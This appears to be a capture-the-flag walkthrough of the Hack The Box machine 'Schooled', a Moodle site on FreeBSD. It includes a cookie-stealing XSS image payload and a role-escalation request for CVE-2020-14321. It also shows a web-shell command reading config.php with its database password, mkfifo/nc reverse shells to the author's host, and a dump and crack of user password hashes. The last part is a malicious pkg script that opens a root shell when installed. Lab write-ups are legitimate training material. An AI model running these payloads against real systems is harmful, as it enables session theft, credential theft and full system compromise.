Schooled

Posted on Sep 13, 2021

Schooled


Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 15:27 EDT
Nmap scan report for 10.10.10.234
Host is up (0.077s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.53 seconds

admissions@schooled.htb

└─$ ffuf -H "Host: FUZZ.schooled.htb" -u http://10.10.10.234 -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fw 5338

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.234
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.schooled.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 5338
________________________________________________

moodle                  [Status: 200, Size: 84, Words: 5, Lines: 2]

Searching default creds gives us admin:admin. Unortunately, these don’t work.

You can login as guest, which shows the available courses and the teachers holding each course.

Which gives us the following teachers:

manuel.phillips
jane.higgins
jamie.borham
lianne.carter

We register as a student and enter the platform. Looking at the online users, shows only 2. Myself and Manuel Philips

Looking at the announcemenets. It appears as if the teacher will manually remove inactive students. Points to us being able to perhaps steal a cookie or similar.

First i set my MoodleNet profile to point to an img hosted on my box.

<img src="http://10.10.16.65/bad>

Lets see if we can steal his cookie.

With reference to Ippsec we make the following payload

<img src="/deh00ni" onerror="document.location.replace('http://10.10.16.65/cookiehere.png' + document.cookie);">

We get his cookie john: 3134be6pc3qacues0tfa7hpmr2 /cookiehere.pngMoodleSession=kgrm9n5s6ugi94pa57tv38gbuq

└─$ sudo nc -nvlp 80                                                                                                                                  1[sudo] password for bob: 
listening on [any] 80 ...
connect to [10.10.16.65] from (UNKNOWN) [10.10.10.234] 55492
GET /MoodleSession=17v6r2k5esor5rc20tbdv8sdv7 HTTP/1.1
Host: 10.10.16.65
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=28
Upgrade-Insecure-Requests: 1

This stackoverflow post shows how we can get the version number of the install by backing up a course.

We create a backup and download it locally and extract the contents:

┌──(bob㉿kali)-[~/htb/schooled]
└─$ tar zxvf backup-moodle2-course-5-maths-20210404-2334-nu.mbz

And we get the build version:

We find CVE-2020-14321

We enrol Lianne Carter and intercept the request

![[20210405021917.png]]

And we change


userlist%5B%5D=25&roletoassign=5 

to userlist%5B%5D=24 to reference Maurice and then change to roletoassign=1 to assign ourself the ‘Manager’ role.

Then we change back to userlist%5B%5D=25&roletoassign=5 to assign Lianne to ‘Student’ and then change the role to 1 to then make her ‘Manager’.

We install the plugin from here

We enumerate the folders and check the config.

`http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=cat%20../../../../config.php

dbtype = 'mysqli'; $CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost'; 
$CFG->dbname = 'moodle'; 
$CFG->dbuser = 'moodle'; 
$CFG->dbpass = 'PlaybookMaster2020'; 
$CFG->prefix = 'mdl_'; 
$CFG->dboptions = array ( 'dbpersist' => 0, 'dbport' => 3306, 'dbsocket' => '', 'dbcollation' => 'utf8_unicode_ci', ); 
$CFG->wwwroot = 'http://moodle.schooled.htb/moodle'; 
$CFG->dataroot = '/usr/local/www/apache24/moodledata'; 
$CFG->admin = 'admin'; 
$CFG->directorypermissions = 0777; require_once(__DIR__ . '/lib/setup.php'); // There is no php closing tag in this file, // it is intentional because it prevents trailing whitespace problems! 

/cookiehere.pngMoodleSession=vav2c5tmuh55pfiriqthpr99rb

sql moodle:PlaybookMaster2020

blocks/rce/lang/en/block_rce.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.65 9001 >/tmp/f

We get shell as www-data

We then start to enumerate sql

$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e"show databases;"
mysql: [Warning] Using a password on the command line interface can be insecure.
Database
information_schema
moodle
$ 

We then execute the following to get the password hashes from the users

/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e"use moodle; select * from mdl_user;"                                                                                                                                                   
mysql: [Warning] Using a password on the command line interface can be insecure.                                                                                                                                                              
id      auth    confirmed       policyagreed    deleted suspended       mnethostid      username        password        idnumber        firstname       lastname        email   emailstop       icq     skype   yahoo   aim     msn     phone1
phone2  institution     department      address city    country lang    calendartype    theme   timezone        firstaccess     lastaccess      lastlogin       currentlogin    lastip  secret  picture url     description     descriptionfor
mat     mailformat      maildigest      maildisplay     autosubscribe   trackforums     timecreated     timemodified    trustbitmask    imagealt        lastnamephonetic        firstnamephonetic       middlename      alternatename   moodle
netprofile                                                                                                                                                                                                                                    
1       manual  1       0       0       0       1       guest   $2y$10$u8DkSWjhZnQhBk1a0g1ug.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2            Guest user              root@localhost  0                                                            e
n       gregorian               99      0       0       0       0                       0               This user is a special user that allows read-only access to some courses.       1       1       0       2       1       0       0    1
608320077       0       NULL    NULL    NULL    NULL    NULL    NULL                                                                                                                                                                          
2       manual  1       0       0       0       1       admin   $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW            Jamie   Borham  jamie@staff.schooled.htb        0                                                    B
ournemouth      GB      en      gregorian               99      1608320129      1608729680      1608681411      1608729680      192.168.1.14            0                       1       1       0       0       1       0       0       160838
9236    0                                                                                                                                                                                                                                     
3       manual  1       0       0       0       1       bell_oliver89   $2y$10$N0feGGafBvl.g6LNBKXPVOpkvs8y/axSPyXb46HiFP3C9c42dhvgK            Oliver  Bell    bell_oliver89@student.schooled.htb      0                                    B
ournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608320808      1608320808      0                     
4       manual  1       0       0       0       1       orchid_sheila89 $2y$10$YMsy0e4x4vKq7HxMsDk.OehnmAcc8tFa0lzj5b1Zc8IhqZx03aryC            Sheila  Orchid  orchid_sheila89@student.schooled.htb    0                                    B
ournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608321097      1608321097      0                     
5       manual  1       0       0       0       1       chard_ellzabeth89       $2y$10$D0Hu9XehYbTxNsf/uZrxXeRp/6pmT1/6A.Q2CZhbR26lCPtf68wUC            Elizabeth       Chard   chard_elizabeth89@student.schooled.htb  0                    B
ournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608321183      1608321183      0                     
6       manual  1       0       0       0       1       morris_jake89   $2y$10$UieCKjut2IMiglWqRCkSzerF.8AnR8NtOLFmDUcQa90lair7LndRy            Jake    Morris  morris_jake89@student.schooled.htb      0                                    B
ournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608380798      1608380798      0                     
7       manual  1       0       0       0       1       heel_james89    $2y$10$sjk.jJKsfnLG4r5rYytMge4sJWj4ZY8xeWRIrepPJ8oWlynRc9Eim            James   Heel    heel_james89@student.schooled.htb       0                                    B
ournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608380861      1608380861      0                     
8       manual  1       0       0       0       1       nash_michael89  $2y$10$yShrS/zCD1Uoy0JMZPCDB.saWGsPUrPyQZ4eAS50jGZUp8zsqF8tu            Michael Nash    nash_michael89@student.schooled.htb     0                                    B
ournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608380931      1608380931      0                     
9       manual  1       0       0       0       1       singh_rakesh89  $2y$10$Yd52KrjMGJwPUeDQRU7wNu6xjTMobTWq3eEzMWeA2KsfAPAcHSUPu            Rakesh  Singh   singh_rakesh89@student.schooled.htb     0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381002      1608381002      0
10      manual  1       0       0       0       1       taint_marcus89  $2y$10$kFO4L15Elng2Z2R4cCkbdOHyh5rKwnG4csQ0gWUeu2bJGt4Mxswoa            Marcus  Taint   taint_marcus89@student.schooled.htb     0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381073      1608381073      0
11      manual  1       0       0       0       1       walls_shaun89   $2y$10$EDXwQZ9Dp6UNHjAF.ZXY2uKV5NBjNBiLx/WnwHiQ87Dk90yZHf3ga            Shaun   Walls   walls_shaun89@student.schooled.htb      0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381128      1608381128      0
12      manual  1       0       0       0       1       smith_john89    $2y$10$YRdwHxfstP0on0Yzd2jkNe/YE/9PDv/YC2aVtC97mz5RZnqsZ/5Em            John    Smith   smith_john89@student.schooled.htb       0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381193      1608381193      0
13      manual  1       0       0       0       1       white_jack89    $2y$10$PRy8LErZpSKT7YuSxlWntOWK/5LmSEPYLafDd13Nv36MxlT5yOZqK            Jack    White   white_jack89@student.schooled.htb       0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381255      1608381255      0
14      manual  1       0       0       0       1       travis_carl89   $2y$10$VO/MiMUhZGoZmWiY7jQxz.Gu8xeThHXCczYB0nYsZr7J5PZ95gj9S            Carl    Travis  travis_carl89@student.schooled.htb      0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381313      1608381313      0
15      manual  1       0       0       0       1       mac_amy89       $2y$10$PgOU/KKquLGxowyzPCUsi.QRTUIrPETU7q1DEDv2Dt.xAjPlTGK3i            Amy     Mac     mac_amy89@student.schooled.htb  0                                            Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381361      1608381361      0
16      manual  1       0       0       0       1       james_boris89   $2y$10$N4hGccQNNM9oWJOm2uy1LuN50EtVcba/1MgsQ9P/hcwErzAYUtzWq            Boris   James   james_boris89@student.schooled.htb      0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381410      1608381410      0
17      manual  1       0       0       0       1       pierce_allan    $2y$10$ia9fKz9.arKUUBbaGo2FM.b7n/QU1WDAFRafgD6j7uXtzQxLyR3Zy            Allan   Pierce  pierce_allan89@student.schooled.htb     0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381478      1608381478      0
18      manual  1       0       0       0       1       henry_william89 $2y$10$qj67d57dL/XzjCgE0qD1i.ION66fK0TgwCFou9yT6jbR7pFRXHmIu            William Henry   henry_william89@student.schooled.htb    0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381530      1608381530      0
19      manual  1       0       0       0       1       harper_zoe89    $2y$10$mnYTPvYjDwQtQuZ9etlFmeiuIqTiYxVYkmruFIh4rWFkC3V1Y0zPy            Zoe     Harper  harper_zoe89@student.schooled.htb       0                                    Bournemouth      GB      en      gregorian               99      0       0       0       0                       0                       1       1       0       2       1       0       1608381592      1608381592      0
[...]
snip

Going over to a box with better GPU we can crack the hash of Jamie

λ hashcat -m 3200 ntlm.txt rockyou.txt
hashcat (v6.1.1) starting...

* Device #1: CUDA SDK Toolkit installation NOT detected.
             CUDA SDK Toolkit installation required for proper device support and utilization
             Falling back to OpenCL Runtime

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 1.2 CUDA 11.2.66) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: GeForce RTX 3060 Ti, 7104/8192 MB (2048 MB allocatable), 38MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 178 MB

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

Cracking performance lower than expected?

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW:!QAZ2wsx

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5G...l4qTiW
Time.Started.....: Mon Apr 05 22:06:41 2021 (13 secs)
Time.Estimated...: Mon Apr 05 22:06:54 2021 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1188 H/s (4.94ms) @ Accel:4 Loops:4 Thr:11 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 15048/14344384 (0.10%)
Rejected.........: 0/15048 (0.00%)
Restore.Point....: 13376/14344384 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1020-1024
Candidates.#1....: hakunamatata -> zazaza
Hardware.Mon.#1..: Temp: 55c Fan:  0% Util: 98% Core:2010MHz Mem:6800MHz Bus:16

Started: Mon Apr 05 22:06:31 2021

jamie:!QAZ2wsx

With the credentials of jamie we can ssh to the box and get the user flag.

Running sudo -l shows a potential path to root.

jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
jamie@Schooled:~ $ 

So we need to create a malicious pkg file.

After some googling we find this and follow the instructions.

Our exploit script ends up looking as follows:


#!/bin/sh

STAGEDIR=/tmp/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}

cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
pw usermod -n root -s /bin/csh
EOF

cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
pw usermod -n root -s /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.65 9001 >/tmp/f
EOF

cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF

mkdir -p ${STAGEDIR}/usr/local/etc
echo "# hello world" > ${STAGEDIR}/usr/local/etc/my.conf
echo "/usr/local/etc/my.conf" > ${STAGEDIR}/plist

pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .

We start our listener and then install the pkg with

jamie@Schooled:~ $ sudo pkg install --no-repo-update *.txz

Rooted!